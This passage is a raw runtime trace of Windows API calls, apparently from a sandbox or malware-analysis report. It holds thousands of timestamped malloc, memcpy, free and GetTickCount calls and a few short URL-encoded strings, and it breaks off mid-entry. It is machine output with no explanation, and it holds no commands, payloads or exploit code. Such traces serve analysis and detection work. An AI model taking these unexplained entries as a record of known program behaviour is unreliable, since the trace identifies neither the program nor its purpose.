GetTickCount () returned 0x210d151 [0100.358] memcpy (in: _Dst=0x24adf9ba928, _Src=0x24adf9ba2fc, _Size=0x4 | out: _Dst=0x24adf9ba928) returned 0x24adf9ba928 [0100.358] malloc (_Size=0x28) returned 0x24ae1394c40 [0100.358] GetTickCount () returned 0x210d151 [0100.358] malloc (_Size=0x28) returned 0x24ae13949d0 [0100.358] GetTickCount () returned 0x210d151 [0100.358] GetTickCount () returned 0x210d151 [0100.358] GetTickCount () returned 0x210d151 [0100.359] memcpy (in: _Dst=0x24adf9baa28, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9baa28) returned 0x24adf9baa28 [0100.359] malloc (_Size=0x28) returned 0x24ae13947f0 [0100.359] GetTickCount () returned 0x210d151 [0100.359] memcpy (in: _Dst=0x24adf9b9f6c, _Src=0x24adf9baa28, _Size=0x4 | out: _Dst=0x24adf9b9f6c) returned 0x24adf9b9f6c [0100.359] memcpy (in: _Dst=0x24adf9b9f68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9f68) returned 0x24adf9b9f68 [0100.359] free (_Block=0x24ae13947f0) [0100.359] GetTickCount () returned 0x210d151 [0100.359] malloc (_Size=0x28) returned 0x24ae13948e0 [0100.359] GetTickCount () returned 0x210d151 [0100.360] malloc (_Size=0x28) returned 0x24ae1394a90 [0100.360] GetTickCount () returned 0x210d151 [0100.360] GetTickCount () returned 0x210d151 [0100.360] GetTickCount () returned 0x210d151 [0100.360] malloc (_Size=0x28) returned 0x24ae13949a0 [0100.360] GetTickCount () returned 0x210d151 [0100.360] free (_Block=0x24ae13949a0) [0100.360] GetTickCount () returned 0x210d151 [0100.360] malloc (_Size=0x28) returned 0x24ae1394cd0 [0100.361] GetTickCount () returned 0x210d151 [0100.361] malloc (_Size=0x28) returned 0x24ae1394af0 [0100.361] GetTickCount () returned 0x210d151 [0100.361] free (_Block=0x24ae1394af0) [0100.361] SysStringLen (param_1="%c2%91%c3%b8%49%59") returned 0x12 [0100.361] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae148cb10 [0100.362] GetTickCount () returned 0x210d151 [0100.362] free (_Block=0x24ae148cb10) [0100.381] realloc (_Block=0x0, _Size=0xa0) returned 0x24ae147f3f0 [0100.381] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x91", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.382] malloc (_Size=0xa8) returned 0x24ae147f970 [0100.382] GetTickCount () returned 0x210d171 [0100.382] malloc (_Size=0x2e0) returned 0x24ae139d630 [0100.382] malloc (_Size=0x80) returned 0x24ae1482060 [0100.382] malloc (_Size=0x108) returned 0x24ae1473340 [0100.382] malloc (_Size=0x80) returned 0x24ae14829f0 [0100.382] malloc (_Size=0x108) returned 0x24ae1474550 [0100.383] malloc (_Size=0xa8) returned 0x24ae147fad0 [0100.383] GetTickCount () returned 0x210d171 [0100.383] malloc (_Size=0x70) returned 0x24ae146f9a0 [0100.383] GetTickCount () returned 0x210d171 [0100.383] GetTickCount () returned 0x210d171 [0100.383] GetTickCount () returned 0x210d171 [0100.383] GetTickCount () returned 0x210d171 [0100.383] memcpy (in: _Dst=0x24ae1a7d140, _Src=0x24adfc6ee30, _Size=0x18 | out: _Dst=0x24ae1a7d140) returned 0x24ae1a7d140 [0100.384] GetTickCount () returned 0x210d171 [0100.384] GetTickCount () returned 0x210d171 [0100.384] memcpy (in: _Dst=0x24adf9ba528, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9ba528) returned 0x24adf9ba528 [0100.384] malloc (_Size=0x28) returned 0x24ae1394c70 [0100.384] GetTickCount () returned 0x210d171 [0100.385] memcpy (in: _Dst=0x24adf9b9d8a, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9b9d8a) returned 0x24adf9b9d8a [0100.385] memcpy (in: _Dst=0x24adf9b9d88, _Src=0x24adf9ba528, _Size=0x2 | out: _Dst=0x24adf9b9d88) returned 0x24adf9b9d88 [0100.385] free (_Block=0x24ae1394c70) [0100.385] GetTickCount () returned 0x210d171 [0100.385] GetTickCount () returned 0x210d171 [0100.385] GetTickCount () returned 0x210d171 [0100.386] GetTickCount () returned 0x210d171 [0100.386] GetTickCount () returned 0x210d171 [0100.387] GetTickCount () returned 0x210d171 [0100.387] GetTickCount () returned 0x210d171 [0100.388] GetTickCount () returned 0x210d171 [0100.388] malloc (_Size=0x28) returned 0x24ae1394ac0 [0100.388] GetTickCount () returned 0x210d171 [0100.388] GetTickCount () returned 0x210d171 [0100.389] GetTickCount () returned 0x210d171 [0100.389] malloc (_Size=0x28) returned 0x24ae1394a00 [0100.389] GetTickCount () returned 0x210d171 [0100.389] GetTickCount () returned 0x210d171 [0100.390] GetTickCount () returned 0x210d171 [0100.391] GetTickCount () returned 0x210d171 [0100.391] malloc (_Size=0x28) returned 0x24ae1394c70 [0100.391] GetTickCount () returned 0x210d171 [0100.391] memcpy (in: _Dst=0x24adf9ba1de, _Src=0x24adf9ba7e8, _Size=0x2 | out: _Dst=0x24adf9ba1de) returned 0x24adf9ba1de [0100.391] memcpy (in: _Dst=0x24adf9ba1dc, _Src=0x24adf9baa88, _Size=0x2 | out: _Dst=0x24adf9ba1dc) returned 0x24adf9ba1dc [0100.391] memcpy (in: _Dst=0x24adf9ba1da, _Src=0x24adf9ba5a8, _Size=0x2 | out: _Dst=0x24adf9ba1da) returned 0x24adf9ba1da [0100.392] memcpy (in: _Dst=0x24adf9ba1d8, _Src=0x24adf9ba768, _Size=0x2 | out: _Dst=0x24adf9ba1d8) returned 0x24adf9ba1d8 [0100.392] free (_Block=0x24ae1394c70) [0100.392] GetTickCount () returned 0x210d171 [0100.392] GetTickCount () returned 0x210d171 [0100.392] GetTickCount () returned 0x210d171 [0100.392] GetTickCount () returned 0x210d171 [0100.393] GetTickCount () returned 0x210d171 [0100.393] memcpy (in: _Dst=0x24adf9ba608, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba608) returned 0x24adf9ba608 [0100.393] malloc (_Size=0x28) returned 0x24ae13947f0 [0100.393] GetTickCount () returned 0x210d171 [0100.394] memcpy (in: _Dst=0x24adf9ba02c, _Src=0x24adf9ba608, _Size=0x4 | out: _Dst=0x24adf9ba02c) returned 0x24adf9ba02c [0100.394] memcpy (in: _Dst=0x24adf9ba028, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba028) returned 0x24adf9ba028 [0100.394] free (_Block=0x24ae13947f0) [0100.395] GetTickCount () returned 0x210d180 [0100.395] memcpy (in: _Dst=0x24adf9baaa8, _Src=0x24adf9ba02c, _Size=0x4 | out: _Dst=0x24adf9baaa8) returned 0x24adf9baaa8 [0100.395] malloc (_Size=0x28) returned 0x24ae1394c70 [0100.395] GetTickCount () returned 0x210d180 [0100.395] GetTickCount () returned 0x210d180 [0100.395] GetTickCount () returned 0x210d180 [0100.395] GetTickCount () returned 0x210d180 [0100.396] GetTickCount () returned 0x210d180 [0100.396] memcpy (in: _Dst=0x24adf9ba948, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba948) returned 0x24adf9ba948 [0100.396] malloc (_Size=0x28) returned 0x24ae1394d60 [0100.396] GetTickCount () returned 0x210d180 [0100.396] memcpy (in: _Dst=0x24adf9ba05c, _Src=0x24adf9ba948, _Size=0x4 | out: _Dst=0x24adf9ba05c) returned 0x24adf9ba05c [0100.396] memcpy (in: _Dst=0x24adf9ba058, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba058) returned 0x24adf9ba058 [0100.397] free (_Block=0x24ae1394d60) [0100.397] GetTickCount () returned 0x210d180 [0100.397] memcpy (in: _Dst=0x24adf9baac8, _Src=0x24adf9ba05c, _Size=0x4 | out: _Dst=0x24adf9baac8) returned 0x24adf9baac8 [0100.397] malloc (_Size=0x28) returned 0x24ae1394af0 [0100.397] GetTickCount () returned 0x210d180 [0100.397] malloc (_Size=0x28) returned 0x24ae1394d60 [0100.398] GetTickCount () returned 0x210d180 [0100.398] GetTickCount () returned 0x210d180 [0100.398] GetTickCount () returned 0x210d180 [0100.398] GetTickCount () returned 0x210d180 [0100.398] GetTickCount () returned 0x210d180 [0100.398] memcpy (in: _Dst=0x24adf9ba828, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba828) returned 0x24adf9ba828 [0100.399] malloc (_Size=0x28) returned 0x24ae1394d90 [0100.399] GetTickCount () returned 0x210d180 [0100.399] memcpy (in: _Dst=0x24adf9ba0ec, _Src=0x24adf9ba828, _Size=0x4 | out: _Dst=0x24adf9ba0ec) returned 0x24adf9ba0ec [0100.399] memcpy (in: _Dst=0x24adf9ba0e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba0e8) returned 0x24adf9ba0e8 [0100.400] free (_Block=0x24ae1394d90) [0100.400] GetTickCount () returned 0x210d180 [0100.400] memcpy (in: _Dst=0x24adf9ba868, _Src=0x24adf9ba0ec, _Size=0x4 | out: _Dst=0x24adf9ba868) returned 0x24adf9ba868 [0100.400] malloc (_Size=0x28) returned 0x24ae1394d90 [0100.400] GetTickCount () returned 0x210d180 [0100.400] malloc (_Size=0x28) returned 0x24ae1394910 [0100.401] GetTickCount () returned 0x210d180 [0100.401] GetTickCount () returned 0x210d180 [0100.401] GetTickCount () returned 0x210d180 [0100.401] GetTickCount () returned 0x210d180 [0100.401] GetTickCount () returned 0x210d180 [0100.402] memcpy (in: _Dst=0x24adf9ba968, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba968) returned 0x24adf9ba968 [0100.402] malloc (_Size=0x28) returned 0x24ae1394df0 [0100.402] GetTickCount () returned 0x210d180 [0100.402] memcpy (in: _Dst=0x24adf9ba17c, _Src=0x24adf9ba968, _Size=0x4 | out: _Dst=0x24adf9ba17c) returned 0x24adf9ba17c [0100.402] memcpy (in: _Dst=0x24adf9ba178, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba178) returned 0x24adf9ba178 [0100.403] free (_Block=0x24ae1394df0) [0100.403] malloc (_Size=0x970) returned 0x24ae13a3f90 [0100.403] GetTickCount () returned 0x210d180 [0100.403] memcpy (in: _Dst=0x24adf9ba988, _Src=0x24adf9ba17c, _Size=0x4 | out: _Dst=0x24adf9ba988) returned 0x24adf9ba988 [0100.403] malloc (_Size=0x28) returned 0x24ae1394df0 [0100.404] GetTickCount () returned 0x210d180 [0100.404] malloc (_Size=0x28) returned 0x24ae13949a0 [0100.404] GetTickCount () returned 0x210d180 [0100.404] memcpy (in: _Dst=0x24adf9a5ebc, _Src=0x24adf9ba988, _Size=0x4 | out: _Dst=0x24adf9a5ebc) returned 0x24adf9a5ebc [0100.405] memcpy (in: _Dst=0x24adf9a5eba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eba) returned 0x24adf9a5eba [0100.405] memcpy (in: _Dst=0x24adf9a5eb6, _Src=0x24adf9ba868, _Size=0x4 | out: _Dst=0x24adf9a5eb6) returned 0x24adf9a5eb6 [0100.405] memcpy (in: _Dst=0x24adf9a5eb4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eb4) returned 0x24adf9a5eb4 [0100.405] memcpy (in: _Dst=0x24adf9a5eb0, _Src=0x24adf9baac8, _Size=0x4 | out: _Dst=0x24adf9a5eb0) returned 0x24adf9a5eb0 [0100.405] memcpy (in: _Dst=0x24adf9a5eae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eae) returned 0x24adf9a5eae [0100.405] memcpy (in: _Dst=0x24adf9a5eaa, _Src=0x24adf9baaa8, _Size=0x4 | out: _Dst=0x24adf9a5eaa) returned 0x24adf9a5eaa [0100.405] memcpy (in: _Dst=0x24adf9a5ea8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ea8) returned 0x24adf9a5ea8 [0100.406] free (_Block=0x24ae13949a0) [0100.406] SysStringLen (param_1="%41%49%44%41") returned 0xc [0100.406] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae148cb10 [0100.407] GetTickCount () returned 0x210d180 [0100.407] memcpy (in: _Dst=0x24adf9b9db8, _Src=0x24ae148cb10, _Size=0x8 | out: _Dst=0x24adf9b9db8) returned 0x24adf9b9db8 [0100.407] free (_Block=0x24ae148cb10) [0100.408] GetTickCount () returned 0x210d180 [0100.408] GetTickCount () returned 0x210d180 [0100.408] memcpy (in: _Dst=0x24ae1a7d128, _Src=0x24adfc6ee30, _Size=0x18 | out: _Dst=0x24ae1a7d128) returned 0x24ae1a7d128 [0100.410] GetTickCount () returned 0x210d190 [0100.410] malloc (_Size=0x28) returned 0x24ae13948b0 [0100.410] GetTickCount () returned 0x210d190 [0100.411] free (_Block=0x24ae13948b0) [0100.411] GetTickCount () returned 0x210d190 [0100.411] GetTickCount () returned 0x210d190 [0100.411] GetTickCount () returned 0x210d190 [0100.411] malloc (_Size=0x28) returned 0x24ae13947f0 [0100.411] GetTickCount () returned 0x210d190 [0100.411] malloc (_Size=0x28) returned 0x24ae1394880 [0100.411] GetTickCount () returned 0x210d190 [0100.412] malloc (_Size=0x28) returned 0x24ae13948b0 [0100.412] GetTickCount () returned 0x210d190 [0100.412] malloc (_Size=0x28) returned 0x24ae13949a0 [0100.412] GetTickCount () returned 0x210d190 [0100.412] free (_Block=0x24ae13949a0) [0100.412] GetTickCount () returned 0x210d190 [0100.412] GetTickCount () returned 0x210d190 [0100.413] malloc (_Size=0x28) returned 0x24ae13949a0 [0100.413] GetTickCount () returned 0x210d190 [0100.413] free (_Block=0x24ae13949a0) [0100.413] GetTickCount () returned 0x210d190 [0100.413] malloc (_Size=0x28) returned 0x24ae13949a0 [0100.413] GetTickCount () returned 0x210d190 [0100.414] GetTickCount () returned 0x210d190 [0100.414] GetTickCount () returned 0x210d190 [0100.414] malloc (_Size=0x28) returned 0x24ae13a4a50 [0100.414] GetTickCount () returned 0x210d190 [0100.414] free (_Block=0x24ae13a4a50) [0100.414] GetTickCount () returned 0x210d190 [0100.415] malloc (_Size=0x28) returned 0x24ae13a4b70 [0100.415] GetTickCount () returned 0x210d190 [0100.415] malloc (_Size=0x28) returned 0x24ae13a4a50 [0100.415] GetTickCount () returned 0x210d190 [0100.415] GetTickCount () returned 0x210d190 [0100.415] GetTickCount () returned 0x210d190 [0100.415] malloc (_Size=0x28) returned 0x24ae13a4c60 [0100.415] GetTickCount () returned 0x210d190 [0100.416] free (_Block=0x24ae13a4c60) [0100.416] GetTickCount () returned 0x210d190 [0100.416] malloc (_Size=0x28) returned 0x24ae13a5080 [0100.416] GetTickCount () returned 0x210d190 [0100.416] malloc (_Size=0x28) returned 0x24ae13a4e40 [0100.416] GetTickCount () returned 0x210d190 [0100.416] GetTickCount () returned 0x210d190 [0100.417] GetTickCount () returned 0x210d190 [0100.417] GetTickCount () returned 0x210d190 [0100.417] malloc (_Size=0x28) returned 0x24ae13a4ff0 [0100.417] GetTickCount () returned 0x210d190 [0100.417] free (_Block=0x24ae13a4ff0) [0100.418] GetTickCount () returned 0x210d190 [0100.418] malloc (_Size=0x28) returned 0x24ae13a4f00 [0100.418] GetTickCount () returned 0x210d190 [0100.418] malloc (_Size=0x28) returned 0x24ae13a4de0 [0100.418] GetTickCount () returned 0x210d190 [0100.418] GetTickCount () returned 0x210d190 [0100.418] GetTickCount () returned 0x210d190 [0100.418] malloc (_Size=0x28) returned 0x24ae13a4960 [0100.418] GetTickCount () returned 0x210d190 [0100.419] free (_Block=0x24ae13a4960) [0100.419] GetTickCount () returned 0x210d190 [0100.419] malloc (_Size=0x28) returned 0x24ae13a50e0 [0100.419] GetTickCount () returned 0x210d190 [0100.419] malloc (_Size=0x28) returned 0x24ae13a4e10 [0100.419] GetTickCount () returned 0x210d190 [0100.420] free (_Block=0x24ae13a4e10) [0100.420] SysStringLen (param_1="%17%c2%8e%16%2a") returned 0xf [0100.420] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae148cb10 [0100.421] GetTickCount () returned 0x210d190 [0100.421] free (_Block=0x24ae148cb10) [0100.422] GetTickCount () returned 0x210d190 [0100.422] malloc (_Size=0x28) returned 0x24ae13a4c60 [0100.423] GetTickCount () returned 0x210d190 [0100.423] free (_Block=0x24ae13a4c60) [0100.423] malloc (_Size=0x70) returned 0x24ae146fa20 [0100.423] GetTickCount () returned 0x210d190 [0100.424] GetTickCount () returned 0x210d190 [0100.424] GetTickCount () returned 0x210d190 [0100.424] GetTickCount () returned 0x210d190 [0100.424] GetTickCount () returned 0x210d190 [0100.424] malloc (_Size=0x28) returned 0x24ae13a4c90 [0100.424] GetTickCount () returned 0x210d190 [0100.424] malloc (_Size=0x28) returned 0x24ae13a4e70 [0100.427] GetTickCount () returned 0x210d19f [0100.427] malloc (_Size=0x28) returned 0x24ae13a4960 [0100.427] GetTickCount () returned 0x210d19f [0100.427] free (_Block=0x24ae13a4960) [0100.427] GetTickCount () returned 0x210d19f [0100.427] GetTickCount () returned 0x210d19f [0100.428] malloc (_Size=0x28) returned 0x24ae13a4ba0 [0100.428] GetTickCount () returned 0x210d19f [0100.428] free (_Block=0x24ae13a4ba0) [0100.428] GetTickCount () returned 0x210d19f [0100.428] malloc (_Size=0x28) returned 0x24ae13a4ae0 [0100.428] GetTickCount () returned 0x210d19f [0100.428] GetTickCount () returned 0x210d19f [0100.428] GetTickCount () returned 0x210d19f [0100.428] malloc (_Size=0x970) returned 0x24ae13a5b00 [0100.429] malloc (_Size=0x28) returned 0x24ae13a4960 [0100.429] GetTickCount () returned 0x210d19f [0100.429] free (_Block=0x24ae13a4960) [0100.430] GetTickCount () returned 0x210d19f [0100.430] malloc (_Size=0x28) returned 0x24ae13a4d20 [0100.430] GetTickCount () returned 0x210d19f [0100.430] malloc (_Size=0x28) returned 0x24ae13a4e10 [0100.430] GetTickCount () returned 0x210d19f [0100.430] GetTickCount () returned 0x210d19f [0100.430] GetTickCount () returned 0x210d19f [0100.430] malloc (_Size=0x28) returned 0x24ae13a4960 [0100.430] GetTickCount () returned 0x210d19f [0100.430] free (_Block=0x24ae13a4960) [0100.430] GetTickCount () returned 0x210d19f [0100.430] malloc (_Size=0x28) returned 0x24ae13a49c0 [0100.430] GetTickCount () returned 0x210d19f [0100.431] malloc (_Size=0x28) returned 0x24ae13a4a80 [0100.431] GetTickCount () returned 0x210d19f [0100.431] GetTickCount () returned 0x210d19f [0100.431] GetTickCount () returned 0x210d19f [0100.431] malloc (_Size=0x28) returned 0x24ae13a4ab0 [0100.431] GetTickCount () returned 0x210d19f [0100.431] free (_Block=0x24ae13a4ab0) [0100.431] GetTickCount () returned 0x210d19f [0100.431] malloc (_Size=0x28) returned 0x24ae13a4960 [0100.431] GetTickCount () returned 0x210d19f [0100.431] malloc (_Size=0x28) returned 0x24ae13a4990 [0100.431] GetTickCount () returned 0x210d19f [0100.432] free (_Block=0x24ae13a4990) [0100.432] SysStringLen (param_1="%43%48%65%70") returned 0xc [0100.432] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae148cb10 [0100.432] GetTickCount () returned 0x210d19f [0100.432] free (_Block=0x24ae148cb10) [0100.433] GetTickCount () returned 0x210d19f [0100.433] malloc (_Size=0x2e0) returned 0x24ae13ad530 [0100.433] malloc (_Size=0x20) returned 0x24ae13a4ba0 [0100.433] malloc (_Size=0x288) returned 0x24ae1396be0 [0100.433] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139cd00 [0100.433] GetTickCount () returned 0x210d19f [0100.433] realloc (_Block=0x24ae13a4ba0, _Size=0x40) returned 0x24ae139eed0 [0100.433] realloc (_Block=0x24ae139cd00, _Size=0x280) returned 0x24ae13ad820 [0100.433] GetTickCount () returned 0x210d19f [0100.433] malloc (_Size=0x508) returned 0x24ae13adab0 [0100.433] realloc (_Block=0x24ae139eed0, _Size=0x80) returned 0x24ae139eed0 [0100.433] realloc (_Block=0x24ae13ad820, _Size=0x500) returned 0x24ae13adfc0 [0100.434] malloc (_Size=0xa08) returned 0x24ae13ae4d0 [0100.434] realloc (_Block=0x24ae139eed0, _Size=0x100) returned 0x24ae139d920 [0100.434] realloc (_Block=0x24ae13adfc0, _Size=0xa00) returned 0x24ae13aeee0 [0100.434] malloc (_Size=0x1408) returned 0x24ae13af8f0 [0100.434] realloc (_Block=0x24ae139d920, _Size=0x200) returned 0x24ae139d920 [0100.434] realloc (_Block=0x24ae13aeee0, _Size=0x1400) returned 0x24ae13b0d00 [0100.434] malloc (_Size=0x2808) returned 0x24ae13b2110 [0100.435] malloc (_Size=0x28) returned 0x24ae13a49f0 [0100.435] GetTickCount () returned 0x210d19f [0100.435] malloc (_Size=0x28) returned 0x24ae13a4a20 [0100.435] GetTickCount () returned 0x210d19f [0100.435] malloc (_Size=0x28) returned 0x24ae13a4b10 [0100.435] GetTickCount () returned 0x210d19f [0100.435] malloc (_Size=0x408) returned 0x24ae13adfc0 [0100.436] free (_Block=0x24ae13a4b10) [0100.436] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.436] GetTickCount () returned 0x210d19f [0100.436] malloc (_Size=0x28) returned 0x24ae13a4990 [0100.436] GetTickCount () returned 0x210d19f [0100.437] free (_Block=0x24ae13a4990) [0100.437] GetTickCount () returned 0x210d19f [0100.437] GetTickCount () returned 0x210d19f [0100.437] GetTickCount () returned 0x210d19f [0100.437] malloc (_Size=0x28) returned 0x24ae13a4d80 [0100.437] GetTickCount () returned 0x210d19f [0100.437] malloc (_Size=0x28) returned 0x24ae13a4ba0 [0100.437] GetTickCount () returned 0x210d19f [0100.437] malloc (_Size=0x28) returned 0x24ae13a4ea0 [0100.438] GetTickCount () returned 0x210d19f [0100.438] malloc (_Size=0x28) returned 0x24ae13a5050 [0100.438] GetTickCount () returned 0x210d19f [0100.438] malloc (_Size=0x28) returned 0x24ae13a4ed0 [0100.438] GetTickCount () returned 0x210d19f [0100.438] malloc (_Size=0x28) returned 0x24ae13a4c30 [0100.438] GetTickCount () returned 0x210d19f [0100.439] free (_Block=0x24ae13a4c30) [0100.439] GetTickCount () returned 0x210d19f [0100.439] GetTickCount () returned 0x210d19f [0100.439] malloc (_Size=0x28) returned 0x24ae13a4f30 [0100.439] GetTickCount () returned 0x210d19f [0100.439] free (_Block=0x24ae13a4f30) [0100.439] GetTickCount () returned 0x210d19f [0100.439] malloc (_Size=0x28) returned 0x24ae13a4d50 [0100.439] GetTickCount () returned 0x210d19f [0100.439] GetTickCount () returned 0x210d19f [0100.439] GetTickCount () returned 0x210d19f [0100.440] malloc (_Size=0x28) returned 0x24ae13a4f30 [0100.440] GetTickCount () returned 0x210d19f [0100.440] free (_Block=0x24ae13a4f30) [0100.440] GetTickCount () returned 0x210d19f [0100.440] malloc (_Size=0x28) returned 0x24ae13a4f30 [0100.440] GetTickCount () returned 0x210d1af [0100.440] malloc (_Size=0x28) returned 0x24ae13a4f60 [0100.440] GetTickCount () returned 0x210d1af [0100.440] GetTickCount () returned 0x210d1af [0100.440] GetTickCount () returned 0x210d1af [0100.440] GetTickCount () returned 0x210d1af [0100.440] malloc (_Size=0x28) returned 0x24ae13a4c00 [0100.441] GetTickCount () returned 0x210d1af [0100.441] free (_Block=0x24ae13a4c00) [0100.441] GetTickCount () returned 0x210d1af [0100.441] malloc (_Size=0x28) returned 0x24ae13a4ab0 [0100.441] GetTickCount () returned 0x210d1af [0100.441] malloc (_Size=0x28) returned 0x24ae13a50b0 [0100.441] GetTickCount () returned 0x210d1af [0100.441] GetTickCount () returned 0x210d1af [0100.441] GetTickCount () returned 0x210d1af [0100.441] malloc (_Size=0x28) returned 0x24ae13a4db0 [0100.441] GetTickCount () returned 0x210d1af [0100.442] free (_Block=0x24ae13a4db0) [0100.442] GetTickCount () returned 0x210d1af [0100.442] malloc (_Size=0x28) returned 0x24ae13a4990 [0100.442] GetTickCount () returned 0x210d1af [0100.442] malloc (_Size=0x28) returned 0x24ae13a4b10 [0100.442] GetTickCount () returned 0x210d1af [0100.442] GetTickCount () returned 0x210d1af [0100.442] GetTickCount () returned 0x210d1af [0100.442] malloc (_Size=0x28) returned 0x24ae13a4bd0 [0100.442] GetTickCount () returned 0x210d1af [0100.443] free (_Block=0x24ae13a4bd0) [0100.443] GetTickCount () returned 0x210d1af [0100.443] malloc (_Size=0x28) returned 0x24ae13a4f90 [0100.443] GetTickCount () returned 0x210d1af [0100.443] malloc (_Size=0x28) returned 0x24ae13a4b40 [0100.443] GetTickCount () returned 0x210d1af [0100.443] malloc (_Size=0x970) returned 0x24ae13a9460 [0100.443] GetTickCount () returned 0x210d1af [0100.443] GetTickCount () returned 0x210d1af [0100.443] GetTickCount () returned 0x210d1af [0100.443] GetTickCount () returned 0x210d1af [0100.443] memcpy (in: _Dst=0x24adf9bbed8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbed8) returned 0x24adf9bbed8 [0100.443] malloc (_Size=0x28) returned 0x24ae13a4fc0 [0100.444] GetTickCount () returned 0x210d1af [0100.444] memcpy (in: _Dst=0x24adf9bb76c, _Src=0x24adf9bbed8, _Size=0x4 | out: _Dst=0x24adf9bb76c) returned 0x24adf9bb76c [0100.444] memcpy (in: _Dst=0x24adf9bb768, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb768) returned 0x24adf9bb768 [0100.444] free (_Block=0x24ae13a4fc0) [0100.444] GetTickCount () returned 0x210d1af [0100.444] memcpy (in: _Dst=0x24adf9bbd98, _Src=0x24adf9bb76c, _Size=0x4 | out: _Dst=0x24adf9bbd98) returned 0x24adf9bbd98 [0100.444] malloc (_Size=0x28) returned 0x24ae13a4bd0 [0100.444] GetTickCount () returned 0x210d1af [0100.444] malloc (_Size=0x28) returned 0x24ae13a4c00 [0100.445] GetTickCount () returned 0x210d1af [0100.445] GetTickCount () returned 0x210d1af [0100.445] GetTickCount () returned 0x210d1af [0100.445] GetTickCount () returned 0x210d1af [0100.445] GetTickCount () returned 0x210d1af [0100.445] memcpy (in: _Dst=0x24adf9bc038, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc038) returned 0x24adf9bc038 [0100.445] malloc (_Size=0x28) returned 0x24ae13a4c30 [0100.445] GetTickCount () returned 0x210d1af [0100.446] memcpy (in: _Dst=0x24adf9bbbec, _Src=0x24adf9bc038, _Size=0x4 | out: _Dst=0x24adf9bbbec) returned 0x24adf9bbbec [0100.446] memcpy (in: _Dst=0x24adf9bbbe8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbbe8) returned 0x24adf9bbbe8 [0100.446] free (_Block=0x24ae13a4c30) [0100.446] GetTickCount () returned 0x210d1af [0100.447] memcpy (in: _Dst=0x24adf9bc338, _Src=0x24adf9bbbec, _Size=0x4 | out: _Dst=0x24adf9bc338) returned 0x24adf9bc338 [0100.447] malloc (_Size=0x28) returned 0x24ae13a4c30 [0100.447] GetTickCount () returned 0x210d1af [0100.447] malloc (_Size=0x28) returned 0x24ae13a4c60 [0100.447] GetTickCount () returned 0x210d1af [0100.447] memcpy (in: _Dst=0x24adf9ad85e, _Src=0x24adf9bc338, _Size=0x4 | out: _Dst=0x24adf9ad85e) returned 0x24adf9ad85e [0100.447] memcpy (in: _Dst=0x24adf9ad85c, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad85c) returned 0x24adf9ad85c [0100.447] memcpy (in: _Dst=0x24adf9ad858, _Src=0x24adf9bbd98, _Size=0x4 | out: _Dst=0x24adf9ad858) returned 0x24adf9ad858 [0100.447] memcpy (in: _Dst=0x24adf9ad856, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad856) returned 0x24adf9ad856 [0100.447] memcpy (in: _Dst=0x24adf9ad852, _Src=0x24adf9bbcb8, _Size=0x4 | out: _Dst=0x24adf9ad852) returned 0x24adf9ad852 [0100.447] memcpy (in: _Dst=0x24adf9ad850, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad850) returned 0x24adf9ad850 [0100.447] memcpy (in: _Dst=0x24adf9ad84c, _Src=0x24adf9bc2b8, _Size=0x4 | out: _Dst=0x24adf9ad84c) returned 0x24adf9ad84c [0100.447] memcpy (in: _Dst=0x24adf9ad84a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad84a) returned 0x24adf9ad84a [0100.447] memcpy (in: _Dst=0x24adf9ad846, _Src=0x24adf9bc0d8, _Size=0x4 | out: _Dst=0x24adf9ad846) returned 0x24adf9ad846 [0100.447] memcpy (in: _Dst=0x24adf9ad844, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad844) returned 0x24adf9ad844 [0100.447] memcpy (in: _Dst=0x24adf9ad840, _Src=0x24adf9bc218, _Size=0x4 | out: _Dst=0x24adf9ad840) returned 0x24adf9ad840 [0100.447] memcpy (in: _Dst=0x24adf9ad83e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad83e) returned 0x24adf9ad83e [0100.447] memcpy (in: _Dst=0x24adf9ad83a, _Src=0x24adf9bc158, _Size=0x4 | out: _Dst=0x24adf9ad83a) returned 0x24adf9ad83a [0100.447] memcpy (in: _Dst=0x24adf9ad838, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ad838) returned 0x24adf9ad838 [0100.448] free (_Block=0x24ae13a4c60) [0100.448] SysStringLen (param_1="%c2%8c%c2%b9%c2%aa%13") returned 0x15 [0100.449] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae3d0 [0100.449] 